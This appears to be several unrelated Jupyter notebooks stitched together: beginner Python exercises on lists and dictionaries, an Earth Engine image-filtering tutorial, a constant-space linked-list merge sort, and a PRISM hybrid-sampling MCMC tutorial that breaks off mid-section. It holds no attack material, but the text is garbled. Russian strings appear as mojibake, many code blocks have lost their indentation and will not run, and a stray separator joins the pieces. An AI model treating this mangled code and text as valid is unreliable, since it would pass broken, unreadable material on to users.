    ['100803', 'Boots for snowboarding DC Tucknee', 20],
    ['100898', 'Pedometer Omron HJA-306', 2],
    ['100934', 'Heart rate monitor Beurer PM62', 17],
]
csv_file_filtered = []
for item in csv_file:
if item[2] >10:
csv_file_filtered.append(item)
print(csv_file_filtered)
contacts = {
'ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั': {
'tel': '5387',
'position': 'ะผะตะฝะตะดะถะตั'
},
'ะกะพะผะพะฒะฐ ะะฐัะฐะปัั': {
'tel': '5443',
'position': 'ัะฐะทัะฐะฑะพััะธะบ'
},
}
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั'])
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั']['tel'])
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั']['position'])
print(contacts.keys())
csv_dict = [
    {'id': '100412', 'position': 'Boots for alpine skis ATOMIC Hawx Prime 100', 'count': 9},
    {'id': '100728', 'position': 'Skateboard Jdbug RT03', 'count': 32},
    {'id': '100732', 'position': 'Caster board Razor RipStik Bright', 'count': 11},
    {'id': '100803', 'position': 'Boots for snowboarding DC Tucknee', 'count': 20},
    {'id': '100898', 'position': 'Pedometer Omron HJA-306', 'count': 2},
    {'id': '100934', 'position': 'Heart rate monitor Beurer PM62', 'count': 17},
]
csv_dict_boots = []
for item in csv_dict:
    if 'Boots' in item['position']:
        csv_dict_boots.append(item)
print(csv_dict_boots)
results = [
{'cost': 98, 'source': 'vk'},
{'cost': 153, 'source': 'yandex'},
{'cost': 110, 'source': 'facebook'},
]
min = 1000
for result in results:
if result ['cost'] < min:
min = result['cost']
print(min)
defect_stats = [
{'step number': 1, 'damage': 0.98},
{'step number': 2, 'damage': 0.99},
{'step number': 3, 'damage': 0.99},
{'step number': 4, 'damage': 0.96},
{'step number': 5, 'damage': 0.97},
{'step number': 6, 'damage': 0.97},
]
size=100 # initial size is 100%, with 0% deviation
number=0 # stage of the production line
for step in defect_stats: # iterate over each dictionary in the list
    size*=step['damage'] # shrink the size by the deformation factor (multiply by the value of the damage key)
    if size<90: # if the accumulated damage has brought the size below 90%
        number=step['step number'] # record the stage at which this happened
        break
print(number)
currency = {
    'AMD': {
        'Name': 'Armenian drams',
        'Nominal': 100,
        'Value': 13.121
    },
    'AUD': {
        'Name': 'Australian dollar',
        'Nominal': 1,
        'Value': 45.5309
    },
    'INR': {
        'Name': 'Indian rupees',
        'Nominal': 100,
        'Value': 92.9658
    },
    'MDL': {
        'Name': 'Moldovan lei',
        'Nominal': 10,
        'Value': 36.9305
    },
}
min = 10000
valuta = ''
for n, v in currency.items():
    if v['Value']/v['Nominal'] < min:
        min = v['Value']/v['Nominal']
        valuta = n
print(valuta)
currency = {
    'AMD': {
        'Name': 'Armenian drams',
        'Nominal': 100,
        'Value': 13.121
    },
    'AUD': {
        'Name': 'Australian dollar',
        'Nominal': 1,
        'Value': 45.5309
    },
    'INR': {
        'Name': 'Indian rupees',
        'Nominal': 100,
        'Value': 92.9658
    },
    'MDL': {
        'Name': 'Moldovan lei',
        'Nominal': 10,
        'Value': 36.9305
    }
}
min = 100000
valuta = ""
for exchange, rate in currency.items(): # iterate over every element of the nested currency dictionary
    if rate['Value']/rate['Nominal']<min: # if Value divided by Nominal is below the current minimum
        min=rate['Value']/rate['Nominal'] # set the new minimum
        valuta=exchange # remember the currency code where the minimum was found
print(valuta)
bodycount = {
    'The Curse of the Black Pearl': {
        'people': 17
    },
    "Dead Man's Chest": {
        'people': 56,
        'hermit crabs': 1
    },
    "At World's End": {
        'people': 88
    },
    'On Stranger Tides': {
        'people': 56,
        'mermaids': 2,
        'poisonous toads': 3,
        'zombie pirates': 2
    }
}
result = []
for film, body in bodycount.items():
for key in body.values():
result.append(key)
sum(result)
```
|
github_jupyter
|
powers = [x**y for x in range(1, 10) for y in [2,10]]
print(powers)
numbers = [x*y for x in range(1, 10) for y in [3, 5, 7]]
print(numbers)
draw_dict = {
'ะ ะพััะธั': 'A',
'ะะพัััะณะฐะปะธั': 'B',
'ะคัะฐะฝัะธั': 'C',
'ะะฐะฝะธั': 'C',
'ะะณะธะฟะตั': 'A'
}
for country, group in draw_dict.items():
print(country, group)
draw_dict = {
'ะ ะพััะธั': 'A',
'ะะพัััะณะฐะปะธั': 'B',
'ะคัะฐะฝัะธั': 'C',
'ะะฐะฝะธั': 'C',
'ะะณะธะฟะตั': 'A'
}
draw_new = {}
for country, group in draw_dict.items():
if group == 'A':
draw_new.setdefault (country, group)
print(draw_new)
2504+4994+6343
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
print(csv_file[4])
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
pulsometer_id = csv_file[4][2]
for record in csv_file:
if record[1] == 'ะจะฐะณะพะผะตั Omron HJA-306':
print('ะะพะปะธัะตััะฒะพ ัะฐะณะพะผะตัะพะฒ ะฝะฐ ัะบะปะฐะดะต - {}ัั'.format(record[2]))
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
csv_file_filtered = []
for item in csv_file:
if item[2] >10:
csv_file_filtered.append(item)
print(csv_file_filtered)
contacts = {
'ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั': {
'tel': '5387',
'position': 'ะผะตะฝะตะดะถะตั'
},
'ะกะพะผะพะฒะฐ ะะฐัะฐะปัั': {
'tel': '5443',
'position': 'ัะฐะทัะฐะฑะพััะธะบ'
},
}
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั'])
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั']['tel'])
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั']['position'])
print(contacts.keys())
csv_dict = [
{'id': '100412', 'position': 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 'count': 9},
{'id': '100728', 'position': 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 'count': 32},
{'id': '100732', 'position': 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 'count': 11},
{'id': '100803', 'position': 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 'count': 20},
{'id': '100898', 'position': 'ะจะฐะณะพะผะตั Omron HJA-306', 'count': 2},
{'id': '100934', 'position': 'ะัะปััะพะผะตัั Beurer PM62', 'count': 17},
]
csv_dict_boots = []
for item in csv_dict:
if 'ะะพัะธะฝะบะธ' in item ['position']:
csv_dict_boots.append(item)
print(csv_dict_boots)
results = [
{'cost': 98, 'source': 'vk'},
{'cost': 153, 'source': 'yandex'},
{'cost': 110, 'source': 'facebook'},
]
min = 1000
for result in results:
if result ['cost'] < min:
min = result['cost']
print(min)
defect_stats = [
{'step number': 1, 'damage': 0.98},
{'step number': 2, 'damage': 0.99},
{'step number': 3, 'damage': 0.99},
{'step number': 4, 'damage': 0.96},
{'step number': 5, 'damage': 0.97},
{'step number': 6, 'damage': 0.97},
]
size=100 # ะธัั
ะพะดะฝัะน ัะฐะทะผะตั 100% ั ะพัะบะปะพะฝะตะฝะธะตะผ 0%\n",
number=0 # ััะฐะฟ ะฟัะพะธะทะฒะพะดััะฒะตะฝะฝะพะน ะปะธะฝะธะธ\n",
for step in defect_stats: #ะัะพั
ะพะดะธะผัั ะฟะพ ะบะฐะถะดะพะผั ะธะท ัะปะพะฒะฐัะตะน ัะฟะธัะบะฐ\n",
size*=step['damage'] # ะฃะผะตะฝััะฐะตะผ ะธัั
ะพะดะฝัะน ัะฐะทะผะตั ะฝะฐ ะฒะตะปะธัะธะฝั ะดะตัะพัะผะฐัะธะธ (ัะผะฝะพะถะฐะตะผ ะฝะฐ ะทะฝะฐัะตะฝะธะต ะบะปััะฐ damage)\n",
if size<90: # ะัะปะธ ะฟะพะปััะธะฒัะธะตัั ะฟะพะฒัะตะถะดะตะฝะธั ะฟัะธะฒะตะปะธ ะบ ัะฐะทะผะตัั ะผะตะฝะตะต 90%\n",
number=step['step number'] # ะะฟัะตะดะตะปัะตะผ ััะฐะฟ, ะฝะฐ ะบะพัะพัะพะผ ััะพ ะฟัะพะธะทะพัะปะพ
break
print(number)
currency = {
    'AMD': {
        'Name': 'Armenian drams',
        'Nominal': 100,
        'Value': 13.121
    },
    'AUD': {
        'Name': 'Australian dollar',
        'Nominal': 1,
        'Value': 45.5309
    },
    'INR': {
        'Name': 'Indian rupees',
        'Nominal': 100,
        'Value': 92.9658
    },
    'MDL': {
        'Name': 'Moldovan lei',
        'Nominal': 10,
        'Value': 36.9305
    },
}
min_rate = 10000
valuta = ''
for n, v in currency.items():
    if v['Value']/v['Nominal'] < min_rate:
        min_rate = v['Value']/v['Nominal']
        valuta = n
print(valuta)
currency = {
    'AMD': {
        'Name': 'Armenian drams',
        'Nominal': 100,
        'Value': 13.121
    },
    'AUD': {
        'Name': 'Australian dollar',
        'Nominal': 1,
        'Value': 45.5309
    },
    'INR': {
        'Name': 'Indian rupees',
        'Nominal': 100,
        'Value': 92.9658
    },
    'MDL': {
        'Name': 'Moldovan lei',
        'Nominal': 10,
        'Value': 36.9305
    }
}
min_rate = 100000
valuta = ""
for exchange, rate in currency.items():  # go through each entry of the nested currency dictionary
    if rate['Value']/rate['Nominal'] < min_rate:  # if Value divided by Nominal is below the current minimum
        min_rate = rate['Value']/rate['Nominal']  # set the new minimum
        valuta = exchange  # store the code of the currency where the minimum occurs
print(valuta)
bodycount = {
    'The Curse of the Black Pearl': {
        'people': 17
    },
    "Dead Man's Chest": {
        'people': 56,
        'hermit crabs': 1
    },
    "At World's End": {
        'people': 88
    },
    'On Stranger Tides': {
        'people': 56,
        'mermaids': 2,
        'poisonous toads': 3,
        'zombie pirates': 2
    }
}
result = []
for film, body in bodycount.items():
    for count in body.values():
        result.append(count)
sum(result)
# Filtering an ImageCollection
As illustrated in the [Get Started section](https://developers.google.com/earth-engine/getstarted) and the [ImageCollection Information section](https://developers.google.com/earth-engine/ic_info), Earth Engine provides a variety of convenience methods for filtering image collections. Specifically, many common use cases are handled by `imageCollection.filterDate()`, and `imageCollection.filterBounds()`. For general purpose filtering, use `imageCollection.filter()` with an ee.Filter as an argument. The following example demonstrates both convenience methods and `filter()` to identify and remove images with bad registration from an `ImageCollection`:
## Install Earth Engine API
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.
The following script checks if the geehydro package has been installed. If not, it will install geehydro, which automatically install its dependencies, including earthengine-api and folium.
```
import subprocess
try:
import geehydro
except ImportError:
print('geehydro package not installed. Installing ...')
subprocess.check_call(["python", '-m', 'pip', 'install', 'geehydro'])
# Import libraries
import ee
import folium
import geehydro
# Authenticate and initialize Earth Engine API
try:
ee.Initialize()
except Exception as e:
ee.Authenticate()
ee.Initialize()
```
## Create an interactive map
This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function.
The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.
```
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
```
## Add Earth Engine Python script
### Simple cloud score
For scoring Landsat pixels by their relative cloudiness, Earth Engine provides a rudimentary cloud scoring algorithm in the `ee.Algorithms.Landsat.simpleCloudScore()` method. Also note that `simpleCloudScore()` adds a band called `cloud` to the input image. The cloud band contains the cloud score from 0 (not cloudy) to 100 (most cloudy).
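Although the example below composites and filters on `IMAGE_QUALITY` rather than on cloud score, a minimal sketch of how `simpleCloudScore()` could be used to mask cloudy pixels is shown here (the scene ID and the threshold of 20 are assumptions for illustration only):
```
# Sketch only: score a single Landsat 5 TOA scene and mask pixels with a high cloud score.
toa_image = ee.Image('LANDSAT/LT05/C01/T1_TOA/LT05_174072_19900102')  # hypothetical asset ID
scored = ee.Algorithms.Landsat.simpleCloudScore(toa_image)            # adds the 'cloud' band (0-100)
cloud_mask = scored.select('cloud').lte(20)                           # keep pixels scored <= 20
masked_image = toa_image.updateMask(cloud_mask)
```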
```
# Load Landsat 5 data, filter by date and bounds.
collection = ee.ImageCollection('LANDSAT/LT05/C01/T2') \
.filterDate('1987-01-01', '1990-05-01') \
.filterBounds(ee.Geometry.Point(25.8544, -18.08874))
# Also filter the collection by the IMAGE_QUALITY property.
filtered = collection \
.filterMetadata('IMAGE_QUALITY', 'equals', 9)
# Create two composites to check the effect of filtering by IMAGE_QUALITY.
badComposite = ee.Algorithms.Landsat.simpleComposite(collection, 75, 3)
goodComposite = ee.Algorithms.Landsat.simpleComposite(filtered, 75, 3)
# Display the composites.
Map.setCenter(25.8544, -18.08874, 13)
Map.addLayer(badComposite,
{'bands': ['B3', 'B2', 'B1'], 'gain': 3.5},
'bad composite')
Map.addLayer(goodComposite,
{'bands': ['B3', 'B2', 'B1'], 'gain': 3.5},
'good composite')
```
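As noted in the introduction, the same metadata filter can be written with the general-purpose `filter()` method and an `ee.Filter` object; a one-line sketch (equivalent to the `filterMetadata()` call above, not part of the original example):
```
# General-purpose filtering: equivalent to .filterMetadata('IMAGE_QUALITY', 'equals', 9)
filtered_alt = collection.filter(ee.Filter.eq('IMAGE_QUALITY', 9))
```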
## Display Earth Engine data layers
```
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
```
## Problem
Given a linked list, sort it in **O(n log n)** time and **constant** space.
For example: the linked list 4 -> 1 -> -3 -> 99 should become
-3 -> 1 -> 4 -> 99
## Solution
We can sort a linked list in O(n log n) by doing something like merge sort:
- Split the list by half using fast and slow pointers
- Recursively sort each half list (base case: when size of list is 1)
- Merge the sorted halves together by using the standard merge algorithm
However, since we are dividing the list in half and recursively sorting it, the function call stack will grow and use up to log n space. We want to do it in constant O(1) space.
Since the problem comes from the call stack (built by recursion), we can transform the algorithm into an iterative one and keep track of the sublist boundaries ourselves to use only constant space.
We can do this by merging blocks at a time from the bottom-up.
Let k be equal to 1. Then we'll merge lists of size k into list of size 2k.
Then double k and repeat, until there are no more merges left.
Consider this example:
```
linked list:
8 -> 6 -> 3 -> 21 -> 23 -> 5
```
After the first pass, we'll combine all pairs so that they are sorted:
```
(6 -> 8) -> and -> (3 -> 21) -> and -> (5 -> 23)
```
And then all groups of 4 (since we doubled k to 2, each merge now combines two sorted runs of length 2 into one of length 4):
```
(3 -> 6 -> 8 -> 21) -> and -> (5 -> 23)
```
And then finally the entire list
```
3 -> 5 -> 6 -> 8 -> 21 -> 23 (now sorted!)
```
```
class Node:
def __init__(self, value, nxt=None):
self.value = value
self.next = nxt
def sort(head):
if not head:
# empty linked list. return
return head
k = 1
while True:
first = head
head = None
tail = None
merges = 0
while first:
merges += 1
# Move second 'k' steps forward.
second = first
first_size = 0
for i in range(k):
first_size += 1
second = second.next
if second is None:
# list contains only one node. break.
break
# Merge lists "first" and "second"
second_size = k
while first_size > 0 or (second_size > 0 and second is not None):
temp = None
if first_size == 0:
temp = second
second = second.next
second_size -= 1
elif second_size == 0 or second is None:
temp = first
first = first.next
first_size -= 1
elif first.value <= second.value:
temp = first
first = first.next
first_size -= 1
else:
temp = second
second = second.next
second_size -= 1
if tail is not None:
tail.next = temp
else:
head = temp
tail = temp
first = second
tail.next = None
if merges <= 1:
return head
k = k * 2
# test with linked list: 8 -> 6 -> 3 -> 21 -> 12 -> 20 -> 5
linked_list = Node(8, nxt=Node(6, nxt=Node(3, nxt=Node(21, nxt=Node(12, nxt=Node(20, nxt=Node(5)))))))
sorted_list = sort(linked_list)
# traverse the linked list
def traverse(head):
current = head
li = []
while current:
li.append(current.value)
current = current.next
return li
traverse(sorted_list)
```
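As a quick sanity check (not part of the original solution), the traversal of the sorted list can be compared against Python's built-in `sorted()` applied to the same values:
```
# The bottom-up merge sort should produce the same ordering as sorted() on the raw values.
assert traverse(sorted_list) == sorted([8, 6, 3, 21, 12, 20, 5])
print(traverse(sorted_list))  # [3, 5, 6, 8, 12, 20, 21]
```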
# Tutorial 4: Hybrid sampling
In this tutorial, we will be introduced to the concept of *hybrid sampling*; the process of using an emulator as an additional prior in a Bayesian analysis.
Hybrid sampling can be used to massively speed up parameter estimation algorithms based on MCMC and Bayesian inference, by utilizing all the information captured by the emulator.
It is assumed here that the reader has successfully completed the first tutorial ([Basic usage](1_basic_usage.ipynb)) and has a basic knowledge of how to perform a Bayesian parameter estimation in Python.
This tutorial mostly covers what can be found in the section on [Hybrid sampling](https://prism-tool.readthedocs.io/en/latest/user/using_prism.html#hybrid-sampling) in the online documentation, but in a more interactive way.
A common problem when using MCMC methods is that it can often take a very long time for MCMC to find its way on the posterior probability distribution function (PDF), which is often referred to as the *burn-in phase*.
This is because, when considering a parameter set for an MCMC walker (where every walker creates its own Markov chain), there is usually no prior information that this parameter set is (un)likely to result into a desirable model realization.
This means that such a parameter set must first be evaluated in the model before any probabilities can be calculated.
However, by constructing an emulator of the model, we can use it as an additional prior for the posterior probability calculation.
Therefore, although *PRISM* is primarily designed to make analyzing models much more efficient and accessible than normal MCMC methods, it is also very capable of enhancing them.
This process is called *hybrid sampling*, which we can perform easily with the `prism.utils` module and which we will explain/explore below.
## Algorithm
Hybrid sampling allows us to use *PRISM* to first analyze a model's behavior, and later use the gathered information to speed up parameter estimations (by using the emulator as an additional prior in a Bayesian analysis).
Hybrid sampling works in the following way:
1. Whenever an MCMC walker proposes a new sample, it is first passed to the emulator of the model;
2. If the sample is not within the defined parameter space, it automatically receives a prior probability of zero (or $-\infty$ in case of logarithmic probabilities).
Else, it will be evaluated in the emulator;
3. If the sample is labeled as implausible by the emulator, it also receives a prior probability of zero.
If it is plausible, the sample is evaluated in the same way as for normal sampling;
4. Optionally, a scaled value of the first implausibility cut-off is used as an exploratory method by adding an additional (non-zero) prior probability.
This can be enabled by using the *impl_prior* input argument in the `get_hybrid_lnpost_fn()`-function factory (which we will cover in a bit).
Since the emulator that *PRISM* makes of a model is not defined outside of the parameter space given by `modellink_obj.par_rng`, the second step is necessary to make sure the results are valid.
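Conceptually, steps 1-3 amount to wrapping the user's log-posterior in an emulator check; a pseudocode sketch is given below (the `in_parameter_space()` and `is_plausible()` helpers are placeholders for illustration, not PRISM's actual API, which we obtain later from `get_hybrid_lnpost_fn()`):
```
# Pseudocode sketch of the hybrid prior logic described in steps 1-3 above.
def hybrid_log_posterior(par_set, emulator, lnpost):
    if not emulator.in_parameter_space(par_set):  # step 2: outside parameter space
        return float('-inf')
    if not emulator.is_plausible(par_set):        # step 3: implausible in the emulator
        return float('-inf')
    return lnpost(par_set)                        # plausible: evaluate as normal
```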
There are several advantages of using hybrid sampling over normal sampling:
- Acceptable samples are guaranteed to be within plausible space;
- This in turn makes sure that the model is only evaluated for plausible samples, which heavily reduces the number of required evaluations;
- No burn-in phase is required, as the starting positions of the MCMC walkers are chosen to be in plausible space;
- As a consequence, varying the number of walkers tends to have a much lower negative impact on the convergence probability and speed;
- Samples with low implausibility values can optionally be favored.
## Usage
### Preparation
Before we can get started, let's import all the basic packages and definitions that we need to do hybrid sampling:
```
# Imports
from corner import corner
from e13tools.pyplot import f2tex
from e13tools.sampling import lhd
import matplotlib.pyplot as plt
import numpy as np
from prism import Pipeline
from prism.modellink import GaussianLink
from prism.utils import get_hybrid_lnpost_fn, get_walkers
```
We also require a constructed emulator of the desired model.
For this tutorial, we will use the trusty `GaussianLink` class again, but feel free to use a different `ModelLink` subclass or modify the settings below (keep in mind that the second iteration may take a little while to analyze):
```
# Emulator construction
# Set required emulator iteration
emul_i = 2
# Create GaussianLink object
model_data = {3: [3.0, 0.1], # f(3) = 3.0 +- 0.1
5: [5.0, 0.1], # f(5) = 5.0 +- 0.1
7: [3.0, 0.1]} # f(7) = 3.0 +- 0.1
modellink_obj = GaussianLink(model_data=model_data)
# Initialize Pipeline
pipe = Pipeline(modellink_obj, working_dir='prism_hybrid')
# Construct required iterations
for i in range(pipe.emulator.emul_i+1, emul_i+1):
# For reproducibility, set the NumPy random seed for each iteration
np.random.seed(1313*i)
# Use analyze=False to use different impl_cuts for different iterations
pipe.construct(i, analyze=False)
# Use different analysis settings for iteration 2
if(i == 2):
pipe.base_eval_sam = 8000
pipe.impl_cut = [4.0, 3.8, 3.6]
# Analyze iteration
pipe.analyze()
# Set NumPy random seed to something random
np.random.seed()
```
### Implementing hybrid sampling
In order to help us with combining *PRISM* with MCMC to use hybrid sampling, the `prism.utils` module provides two support functions: `get_walkers()` and `get_hybrid_lnpost_fn()`.
As these functions will make our job of using hybrid sampling much easier, let's take a look at both of them.
#### get_walkers()
If we were to do normal MCMC sampling, then it would be required for us to provide our sampling script (whatever that may be) with the starting positions of all MCMC walkers, or at least with the number of MCMC walkers we want.
Normally, we would have no idea what starting positions to choose, as we know nothing about the corresponding model parameter space.
However, as we have already constructed an emulator of the target model, we actually do have some information at our disposal that could help us in choosing their starting positions.
Preferably, we would choose the starting positions of the MCMC walkers in the plausible space of the emulator, as we know that these will be close to the desired parameter set.
This is where the `get_walkers()`-function comes in.
It allows us to obtain a set of plausible starting positions for our MCMC walkers, given a `Pipeline` object.
By default, `get_walkers()` returns the available plausible samples of the last constructed iteration (`pipe.impl_sam`), but we can also supply it with an integer stating how many starting positions we want to propose or we can provide our own set of proposed starting positions.
Below we can see these three different scenarios in action:
```
# Use impl_sam if it is available (default)
n_walkers, p0_walkers = get_walkers(pipe)
print("Number of plausible starting positions (default) : %i" % (n_walkers))
# Propose 10000 starting positions
init_walkers = 10000
n_walkers, p0_walkers = get_walkers(pipe, init_walkers=init_walkers)
print("Number of plausible starting positions (integer) : %i" % (n_walkers))
# Propose custom set of 10000 starting positions
init_walkers = lhd(10000, modellink_obj._n_par, modellink_obj._par_rng)
n_walkers, p0_walkers = get_walkers(pipe, init_walkers=init_walkers)
print("Number of plausible starting positions (custom) : %i" % (n_walkers), flush=True)
# Request at least 1000 plausible starting positions (requires v1.1.4 or later)
n_walkers, p0_walkers = get_walkers(pipe, req_n_walkers=1000)
print("Number of plausible starting positions (specific): %i" % (n_walkers))
```
Note that when there is still a large part of parameter space left, the number of plausible starting positions will probably greatly vary between runs when a specific number is requested.
As hybrid sampling works better when plausible space is very small, it is usually recommended that we first construct a good emulator before attempting to do hybrid sampling.
This is also why we used different implausibility parameters for the analysis of the second emulator iteration.
As *PRISM*'s sampling methods operate in parameter space, `get_walkers()` automatically assumes that all starting positions are defined in parameter space.
However, as some sampling methods use unit space, we can request normalized starting positions by providing `get_walkers()` with *unit_space=True*.
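For instance, a call of the following form (a sketch using the same `pipe` object as above) would return starting positions normalized to the unit hypercube:
```
# Request starting positions in unit space (all values scaled to [0, 1])
n_walkers, p0_walkers_unit = get_walkers(pipe, unit_space=True)
```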
We have to keep in mind though that, because of the way the emulator works, there is no guarantee for a specific number of plausible starting positions to be returned.
Having the desired emulator iteration already analyzed may give us an indication of how many starting positions in total we need to propose to be left with a specific number.
However, starting with v1.1.4, the `get_walkers()`-function takes the *req_n_walkers* argument, which allows us to request a specific minimum number of plausible starting positions (as shown).
When the starting positions of our MCMC walkers have been determined, we can use them in our MCMC sampling script, avoiding the previously mentioned burn-in phase.
Although this in itself can already be very useful, it does not allow us to perform hybrid sampling yet.
In order to do this, we additionally need something else.
#### get_hybrid_lnpost_fn()
Most MCMC methods require the definition of an `lnpost()`-function.
This function takes a proposed sample step in the chain of an MCMC walker and returns the corresponding natural logarithm of the posterior probability.
The returned value is then compared with the current value, and the new step is accepted with some probability based on this comparison.
As we have learned, in order to do hybrid sampling, we require the [algorithm](#Algorithm) described before.
Therefore, we need to modify this `lnpost()`-function to first evaluate the proposed sample in the emulator and only perform the normal posterior probability calculation when this sample is plausible.
Making this modification is the job of the `get_hybrid_lnpost_fn()`-function factory.
It takes a user-defined `lnpost()`-function (as input argument *lnpost_fn*) and a `Pipeline` object, and returns a function definition ``hybrid_lnpost(par_set, *args, **kwargs)``.
This `hybrid_lnpost()`-function first analyzes a proposed *par_set* in the emulator, and passes *par_set* (along with any additional arguments) to `lnpost()` if the sample is plausible, or returns $-\infty$ if it is not.
The return-value of the `lnpost()`-function is then returned by the `hybrid_lnpost()`-function as well.
The reason why we use a function factory here, is that it allows us to validate all input arguments once and then save them as local variables for the `hybrid_lnpost()`-function.
Not only does this avoid that we have to provide and validate all input arguments (like *emul_i* and *pipeline_obj*) for every individual proposal, but it also ensures that we always use the same arguments, as we cannot modify the local variables of a function.
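The function-factory pattern itself is plain Python; a minimal, generic sketch (unrelated to PRISM's internals) illustrates the idea of validating arguments once and capturing them in a closure:
```
# Generic function factory: validate/capture arguments once, return a specialized function.
def make_scaled_lnpost(lnpost_fn, scale):
    if scale <= 0:
        raise ValueError("scale must be positive")  # validated once, at creation time
    def scaled_lnpost(par_set, *args, **kwargs):
        return scale*lnpost_fn(par_set, *args, **kwargs)  # 'scale' is fixed inside this closure
    return scaled_lnpost
```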
So, let's define an `lnpost()`-function, which uses a simple Gaussian probability function:
```
# Pre-calculate the data variance. Assume data_err is centered
data_var = np.array([err[0]**2 for err in modellink_obj._data_err])
# Add a global counter to measure the number of times the model is called
global call_counter
call_counter = 0
# Define lnpost
def lnpost(par_set):
# Check if par_set is within parameter space and return -infty if not
# Note that this is not needed if we solely use lnpost for hybrid sampling
par_rng = modellink_obj._par_rng
if not ((par_rng[:, 0] <= par_set)*(par_set <= par_rng[:, 1])).all():
return(-np.infty)
# Increment call_counter by one
global call_counter
call_counter += 1
# Convert par_set to par_dict
par_dict = dict(zip(modellink_obj._par_name, par_set))
# Evaluate model at requested parameter set
mod_out = modellink_obj.call_model(emul_i, par_dict,
modellink_obj._data_idx)
# Get model and total variances
md_var = modellink_obj.get_md_var(emul_i, par_dict,
modellink_obj._data_idx)
tot_var = md_var+data_var
# Calculate the posterior probability
return(-0.5*(np.sum((modellink_obj._data_val-mod_out)**2/tot_var)))
```
As we already have a way of evaluating our model using the `ModelLink` subclass, we used this to our advantage and simply made the `call_model()` and `get_md_var()`-methods part of the posterior probability calculation.
We also know that the data variance will not change in between evaluations, so we calculated it once outside of the function definition.
Keep in mind that hybrid sampling itself already checks if a proposed sample is within parameter space, and it was therefore not necessary to check for this in our `lnpost()`-function, unless we are going to do normal sampling as well (in which case it acts as a prior).
Now that we have defined our `lnpost()`-function, we can create a specialized version of it that automatically performs hybrid sampling:
```
hybrid_lnpost = get_hybrid_lnpost_fn(lnpost, pipe)
```
As with the `get_walkers()`-function, the `get_hybrid_lnpost_fn()`-function factory can be set to perform in unit space by providing it with *unit_space=True*.
This will make the returned `hybrid_lnpost()`-function expect normalized samples.
We also have to keep in mind that by calling the `get_hybrid_lnpost_fn()`-function factory, *PRISM* has turned off all normal logging.
This is to avoid having thousands of similar logging messages being made.
It can be turned back on again by executing `pipe.do_logging = True`.
We can check if the returned `hybrid_lnpost()`-function really will perform hybrid sampling, by evaluating an implausible sample in it (in almost all cases, `[1, 1, 1]` will be implausible for the `GaussianLink` class. If not, feel free to change the sample):
```
# Define a sample
par_set = [1, 1, 1]
# Evaluate it in the pipeline to check if it is plausible
pipe.evaluate(par_set)
# Evaluate this sample in both lnpost and hybrid_lnpost
print()
print(" lnpost(%s) = %s" % (par_set, lnpost(par_set)))
print("hybrid_lnpost(%s) = %s" % (par_set, hybrid_lnpost(par_set)))
```
Here, we can see that while the proposed sample does give a finite log-posterior probability when evaluated in the `lnpost()`-function, this is not the case when evaluated in the `hybrid_lnpost()`-function due to the sample not being plausible in the emulator.
And, finally, as it is very likely that we will frequently use `get_walkers()` and `get_hybrid_lnpost_fn()` together, the `get_walkers()`-function allows for the *lnpost_fn* input argument to be provided to it.
Doing so will automatically call the `get_hybrid_lnpost_fn()`-function factory using the provided *lnpost_fn* and the same input arguments given to `get_walkers()`, and return the obtained `hybrid_lnpost()`-function in addition to the starting positions of the MCMC walkers.
So, before we get into applying hybrid sampling to our model, let's use the `get_walkers()`-function to obtain all the variables we need:
```
n_walkers, p0_walkers, hybrid_lnpost = get_walkers(pipe, lnpost_fn=lnpost)
```
## Application
Now that we know how to apply hybrid sampling to our model in theory, let's see it in action.
